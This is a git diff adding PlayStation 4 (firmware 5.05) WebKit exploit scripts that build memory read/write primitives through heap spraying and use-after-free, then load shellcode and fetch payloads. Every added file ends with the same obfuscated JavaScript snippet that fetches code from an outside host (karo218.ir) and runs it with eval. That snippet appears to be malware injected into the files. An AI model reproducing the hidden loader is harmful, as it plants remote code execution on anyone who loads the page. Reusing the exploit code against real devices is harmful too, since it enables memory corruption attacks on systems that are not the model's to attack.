0xFFFFFEF8, 0xF1E8EF89, 0x48FFFFFE, 0x200000B8, 0x00000926, 0x48D0FF00, 0x5B10C483, 0xC35C415D, 0xC3C3C3C3]; + var shellbuf = p.malloc32(0x1000); + for (var i = 0; i < loader_shcode.length; i++) { + shellbuf.backing[i] = loader_shcode[i]; + } + p.syscall(74, shellbuf, 0x4000, 7); // sys_mprotect + var thread_id = p.malloc(0x08); + p.fcall(gadgets['scePthreadCreate'], thread_id, 0, shellbuf, 0, p.stringify('loader')); + awaitpl(); + } catch (e) { + throw new Error(e.message); + } + } + }; + + window.runPayload = function (path) { + var xhr = new XMLHttpRequest(); + xhr.open('GET', path); + xhr.responseType = 'arraybuffer'; + xhr.onreadystatechange = function () { + if (xhr.readyState === 4 && xhr.status === 200) { + try { + var code_addr = new int64(0x26100000, 0x00000009); + var mapped_address = p.syscall(477, code_addr, 0x300000, 7, 0x41000, -1, 0); // sys_mmap + if (mapped_address != '926100000') { + throw new Error('Could not Allocate Buffer!'); + } + + // Trick for 4 bytes padding + var padding = new Uint8Array(4 - (xhr.response.byteLength % 4) % 4); + var tmp = new Uint8Array(xhr.response.byteLength + padding.byteLength); + tmp.set(new Uint8Array(xhr.response), 0); + tmp.set(padding, xhr.response.byteLength); + + var shellcode = new Uint32Array(tmp.buffer); + for (var i = 0; i < shellcode.length; i++) { + p.write4(code_addr.add32(0x100000 + i * 4), shellcode[i]); + } + p.fcall(code_addr); + p.syscall(73, code_addr, 0x300000); // sys_munmap + } catch (e) { + throw new Error(e.message); + } + }/* else { + throw new Error('Issue Retreiving Payload! #2'); + } + */ + }; + xhr.onerror = function () { + throw new Error('Issue Retreiving Payload! #1'); + }; + // TODO: sleep(1000); + xhr.send(); + // TODO: sleep(3000); + }; + + if (p.fcall(gadgets['mov rax, rdi'], 0x41414141) != 41414141) { + throw new Error('Userland ROP execution not working'); + } + + if (!module_dump) { + while (p.syscall(23, 0) != 0) { // sys_setuid + kernelExploit(); + } + } else { + /* TODO */ + } + + if (module_dump) { + // This should have run above + allset(); + } else if (kernel_dump) { + // This should have run in kernExploit() + allset(); + } else if (bin_loader) { + binLoader(); + } else if (embedded_payload) { + runPayload(payload_location); + allset(); + } else { + throw new Error('No goal selected for exploit!'); + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/webkitExploit_haveABadTime.js b/505/webkitExploit_haveABadTime.js new file mode 100644 index 00000000..2231d531 --- /dev/null +++ b/505/webkitExploit_haveABadTime.js @@ -0,0 +1,202 @@ +function webkitExploit_haveABadTime() { + var instancespr = []; + for (var i = 0; i < 4096; i++) { + instancespr[i] = new Uint32Array(1); + instancespr[i][makeid()] = 50057; + } + + var tgt = { + a: 0, + b: 0, + c: 0, + d: 0, + }; + + var y = new ImageData(1, 0x4000); + postMessage('', '*', [y.data.buffer]); + + var props = {}; + + for (var i = 0; (i < (0x4000 / 2));) { + props[i++] = { + value: 0x42424242, + }; + props[i++] = { + value: tgt, + }; + } + + var foundLeak = undefined; + var foundIndex = 0; + var maxCount = 0x100; + + while (foundLeak == undefined && maxCount > 0) { + maxCount--; + + history.pushState(y, ''); + + Object.defineProperties({}, props); + + try { + var leak = new Uint32Array(history.state.data.buffer); + } catch (e) { + throw new Error('Failed to find leak!'); + } + + for (var i = 0; i < leak.length - 6; i++) { + if ( + leak[i] == 0x42424242 + && leak[i + 0x1] == 0xFFFF0000 + && leak[i + 0x2] == 0x00000000 + && leak[i + 0x3] == 0x00000000 + && leak[i + 0x4] == 0x00000000 + && leak[i + 0x5] == 0x00000000 + && leak[i + 0x6] == 0x0000000E + && leak[i + 0x7] == 0x00000000 + && leak[i + 0xA] == 0x00000000 + && leak[i + 0xB] == 0x00000000 + && leak[i + 0xC] == 0x00000000 + && leak[i + 0xD] == 0x00000000 + && leak[i + 0xE] == 0x0000000E + && leak[i + 0xF] == 0x00000000 + ) { + foundIndex = i; + foundLeak = leak; + break; + } + } + } + + if (!foundLeak) { + throw new Error('Failed to find leak!'); + } + + var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40); + var leakJSVal = new int64(firstLeak[8], firstLeak[9]); + + try { + Array.prototype.__defineGetter__(100, () => 1); + + var f = document.body.appendChild(document.createElement('iframe')); + var a = new f.contentWindow.Array(13.37, 13.37); + var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37); + + var master = new Uint32Array(0x1000); + var slave = new Uint32Array(0x1000); + var leakval_u32 = new Uint32Array(0x1000); + var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10]; + + tgt.a = u2d(2048, 0x1602300); + tgt.b = 0; + tgt.c = leakval_helper; + tgt.d = 0x1337; + + var c = Array.prototype.concat.call(a, b); + document.body.removeChild(f); + var hax = c[0]; + c[0] = 0; + + tgt.c = c; + + hax[2] = 0; + hax[3] = 0; + + Object.defineProperty(Array.prototype, 100, { + get: undefined, + }); + + tgt.c = leakval_helper; + var butterfly = new int64(hax[2], hax[3]); + butterfly.low += 0x10; + + tgt.c = leakval_u32; + var lkv_u32_old = new int64(hax[4], hax[5]); + hax[4] = butterfly.low; + hax[5] = butterfly.hi; + + tgt.c = master; + hax[4] = leakval_u32[0]; + hax[5] = leakval_u32[1]; + + var addr_to_slavebuf = new int64(master[4], master[5]); + tgt.c = leakval_u32; + hax[4] = lkv_u32_old.low; + hax[5] = lkv_u32_old.hi; + + tgt.c = 0; + hax = 0; + + var prim = { + write8: function (addr, val) { + master[4] = addr.low; + master[5] = addr.hi; + + if (val instanceof int64) { + slave[0] = val.low; + slave[1] = val.hi; + } else { + slave[0] = val; + slave[1] = 0; + } + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + }, + + write4: function (addr, val) { + master[4] = addr.low; + master[5] = addr.hi; + + slave[0] = val; + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + }, + + read8: function (addr) { + master[4] = addr.low; + master[5] = addr.hi; + + var rtv = new int64(slave[0], slave[1]); + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + + return rtv; + }, + + read4: function (addr) { + master[4] = addr.low; + master[5] = addr.hi; + + var rtv = slave[0]; + + master[4] = addr_to_slavebuf.low; + master[5] = addr_to_slavebuf.hi; + + return rtv; + }, + + leakval: function (jsval) { + leakval_helper[0] = jsval; + var rtv = this.read8(butterfly); + this.write8(butterfly, new int64(0x41414141, 0xFFFF0000)); + + return rtv; + }, + + createval: function (jsval) { + this.write8(butterfly, jsval); + var rt = leakval_helper[0]; + this.write8(butterfly, new int64(0x41414141, 0xFFFF0000)); + return rt; + }, + }; + + window.p = prim; + postWebkitExploit(); + } catch (e) { + throw new Error(e.message); + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/webkitExploit_stackUnitializedRead.js b/505/webkitExploit_stackUnitializedRead.js new file mode 100644 index 00000000..a25e344e --- /dev/null +++ b/505/webkitExploit_stackUnitializedRead.js @@ -0,0 +1,360 @@ +function webkitExploit_stackUnitializedRead() { + var memPressure = new Array(400); + var stackFrame = []; + var frameIndex = 0; + var stackPeek = 0; + + var doGarbageCollection = function () { + for (var i = 0; i < memPressure.length; i++) { + memPressure[i] = new Uint32Array(0x10000); + } + + for (var i = 0; i < memPressure.length; i++) { + memPressure[i] = 0; + } + }; + + function peek_stack() { + var mem; + var retno; + var oldRetno; + + retno = 0xFFFF; + + arguments.length = { + valueOf: function () { + oldRetno = retno; + retno = 1; + return oldRetno; + }, + }; + + var args = arguments; + + (function () { + (function () { + (function () { + mem = arguments[0xFF00]; + }).apply(undefined, args); + }).apply(undefined, stackFrame); + }).apply(undefined, stackFrame); + + stackPeek = mem; + + return mem; + } + + function poke_stack(val) { + stackFrame[frameIndex] = val; + + (function () { + (function () { + (function () {}).apply(null, stackFrame); + }).apply(null, stackFrame); + }).apply(null, stackFrame); + + stackFrame[frameIndex] = ''; + } + + try { + for (var i = 0; i < 0xFFFF; i++) { + stackFrame[i] = i; + } + + frameIndex = 0; + poke_stack(0); + + if (peek_stack() == undefined) { + throw new Error('System is not vulnerable!'); + } + + frameIndex = 0; + poke_stack(0); + + peek_stack(); + frameIndex = stackPeek; + + poke_stack(0x4141); + + for (var align = 0; align < 8; align++) { + (function () {})(); + } + + peek_stack(); + + if (stackPeek != 0x4141) { + throw new Error('Couldn\'t align stack frame to stack!'); + } + + var butterflySpray = new Array(0x1000); + + for (var i = 0; i < 0x1000; i++) { + butterflySpray[i] = []; + + for (var k = 0; k < 0x40; k++) { + butterflySpray[i][k] = 0x42424242; + } + + butterflySpray[i].unshift(butterflySpray[i].shift()); + } + + var sprayOne = new Array(0x100); + + for (var i = 0; i < 0x100; i++) { + sprayOne[i] = [1]; + + if (!(i & 3)) { + for (var k = 0; k < 0x8; k++) { + sprayOne[i][k] = 0x43434343; + } + } + + sprayOne[i].unshift(sprayOne[i].shift()); + } + + var sprayTwo = new Array(0x400); + + for (var i = 0; i < 0x400; i++) { + sprayTwo[i] = [2]; + + if (!(i & 3)) { + for (var k = 0; k < 0x80; k++) { + sprayTwo[i][k] = 0x43434343; + } + } + + sprayTwo[i].unshift(sprayTwo[i].shift()); + } + + var uafTarget = []; + + for (var i = 0; i < 0x80; i++) { + uafTarget[i] = 0x42420000; + } + + poke_stack(uafTarget); + + uafTarget = 0; + sprayOne = 0; + sprayTwo = 0; + + for (var k = 0; k < 4; k++) { + doGarbageCollection(); + } + + peek_stack(); + uafTarget = stackPeek; + + stackPeek = 0; + + for (var i = 0; i < 0x1000; i++) { + for (var k = 0x0; k < 0x80; k++) { + butterflySpray[i][k] = 0x7FFFFFFF; + + if (uafTarget.length == 0x7FFFFFFF) { + var butterflyIndex = i; + + for (var i = 0; i < butterflyIndex; i++) { + butterflySpray[i] = 0; + } + + for (var i = butterflyIndex + 1; i < 0x1000; i++) { + butterflySpray[i] = 0; + } + + doGarbageCollection(); + + var primitiveSpray = new Array(0x20000); + var potentialPrim = new ArrayBuffer(0x1000); + + for (var i = 0; i < 0x20000; i++) { + primitiveSpray[i] = i; + } + + var overlap = new Array(0x80); + + for (var i = 0; i < 0x20000; i++) { + primitiveSpray[i] = new Uint32Array(potentialPrim); + } + + var currentQword = 0x10000; + var found = false; + var smashedButterfly = new int64(0, 0); + var origData = new int64(0, 0); + var locateHelper = new int64(0, 0); + + while (!found) { + var savedVal = uafTarget[currentQword]; + uafTarget[currentQword] = 0x1337; + + for (var i = 0; i < 0x20000; i++) { + if (primitiveSpray[i] && primitiveSpray[i].byteLength != 0x1000) { + uafTarget[currentQword] = savedVal; + + var primitive = primitiveSpray[i]; + var overlap = [1337]; + + uafTarget[currentQword - 5] = overlap; + + smashedButterfly.low = primitive[2]; + smashedButterfly.hi = primitive[3]; + smashedButterfly.keep_gc = overlap; + + uafTarget[currentQword - 5] = uafTarget[currentQword - 2]; + + butterflySpray[butterflyIndex][k] = 0; + + origData.low = primitive[4]; + origData.hi = primitive[5]; + + primitive[4] = primitive[12]; + primitive[5] = primitive[13]; + primitive[14] = 0x40; + + var slave = undefined; + + for (var k = 0; k < 0x20000; k++) { + if (primitiveSpray[k].length == 0x40) { + slave = primitiveSpray[k]; + break; + } + } + + if (!slave) { + throw new Error('Could not find slave for write primitive!'); + } + + primitive[4] = smashedButterfly.low; + primitive[5] = smashedButterfly.hi; + + overlap[0] = uafTarget; + + var targetEntry = new int64(slave[0], slave[1]); + + primitive[4] = targetEntry.low; + primitive[5] = targetEntry.hi; + slave[2] = 0; + slave[3] = 0; + + uafTarget = 0; + primitiveSpray = 0; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + var prim = { + write8: function (addr, val) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + if (val == undefined) { + val = new int64(0, 0); + } + if (!(val instanceof int64)) { + val = new int64(val, 0); + } + + slave[0] = val.low; + slave[1] = val.hi; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + }, + + write4: function (addr, val) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + slave[0] = val; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + }, + + read8: function (addr) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + var val = new int64(slave[0], slave[1]); + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + + read4: function(addr) { + primitive[4] = addr.low; + primitive[5] = addr.hi; + + var val = slave[0]; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + + leakval: function (obj) { + primitive[4] = smashedButterfly.low; + primitive[5] = smashedButterfly.hi; + + overlap[0] = obj; + + var val = new int64(slave[0], slave[1]); + + slave[0] = 1337; + slave[1] = 0xffff0000; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + + createval: function (val) { + primitive[4] = smashedButterfly.low; + primitive[5] = smashedButterfly.hi; + + slave[0] = val.low; + slave[1] = val.hi; + + var val = overlap[0]; + + slave[0] = 1337; + slave[1] = 0xffff0000; + + primitive[4] = origData.low; + primitive[5] = origData.hi; + + return val; + }, + }; + + if (prim.createval(prim.leakval(0x1337)) != 0x1337) { + throw new Error('Primitive is broken, jsvalue leaked does not match jsvalue created!'); + } + var testData = [1, 2, 3, 4, 5, 6, 7, 8]; + var testAddr = prim.leakval(testData); + var butterflyAddr = prim.read8(testAddr.add32(8)); + if ((butterflyAddr.low == 0 && butterflyAddr.hi == 0) || prim.createval(prim.read8(butterflyAddr)) != 1) { + throw new Error('Primitive is broken, either butterfly address is null or object is not a valid jsvalue!'); + } + + window.p = prim; + userland(); + } + } + uafTarget[currentQword] = savedVal; + currentQword++; + } + } + } + } + + throw new Error('UAF not modified!'); + } catch (e) { + throw new Error(e.message); + } +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file